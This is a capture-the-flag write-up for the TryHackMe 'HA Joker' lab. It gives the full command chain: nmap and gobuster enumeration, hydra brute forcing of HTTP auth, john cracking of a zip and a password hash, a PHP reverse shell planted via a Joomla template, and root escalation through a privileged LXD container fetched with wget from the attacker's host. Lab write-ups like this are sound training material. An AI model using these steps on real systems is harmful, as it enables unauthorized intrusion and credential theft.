← back to write ups

Write Up

HA Joker CTF

TryHackMe Medium 450 pts Linux Room ↗

Enumeration with Nmap

Initial reconnaissance, checking service versions on open ports:

nmap -v -sC -sV -oA nmap 10.10.173.35

Apache 2.4.29 is identified, with port 80 serving HTTP content.

Searching Directories

Directory enumeration reveals a hidden file, /secret.txt, and gobuster surfaces /phpinfo.php:

gobuster dir -u http://10.10.173.35/ -w /usr/share/wordlists/dirb/common.txt

The /secret.txt file contains a conversation between Joker and Batman, suggesting the username joker.

Unauthorized HTTP Port

An additional port requiring authentication is identified from the nmap scan: port 8080.

Brute Force Authentication

hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.173.35 http-get/

The password recovered is hannah.

Directory Enumeration on Port 8080

gobuster dir -U joker -P hannah -u http://10.10.173.35:8080/ -w /usr/share/wordlists/dirb/common.txt -t 20

This reveals /administrator/. Deeper enumeration with nikto surfaces /backup.zip:

nikto -h http://10.10.173.35:8080/ -id joker:hannah

Cracking the Password-Protected Archive

zip2john backup.zip > joker.hash
sudo john joker.hash

The archive password is hannah. The extracted joombadb.sql reveals a "super duper user" entry: admin.

Cracking the Password Hash

echo '$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG' > pass.txt
sudo john pass.txt --show

The password is abcd1234.

Obtaining a Shell

Logging into the administrator panel and exploiting template functionality to inject a reverse shell. The Beez3 template is editable and can execute PHP code when previewed. After setting up the payload and listener:

nc -lvnp [PORT]

A connection is established as www-data.

Privilege Escalation via LXD

Checking groups shows the user belongs to the lxd group:

id

Upgrade to an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Initialize LXD with a directory storage backend, then build an Alpine container:

lxd init

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Serve the built image and download it to the target:

sudo python3 -m http.server 80

cd /tmp
wget http://[YOUR_IP]:80/alpine-v3.12-x86_64-20200923_0009.tar.gz

Import and configure a privileged container mounting the host filesystem:

lxc image import ./alpine-v3.12-x86_64-20200923_0009.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Root access achieved — the final flag lives at final.txt.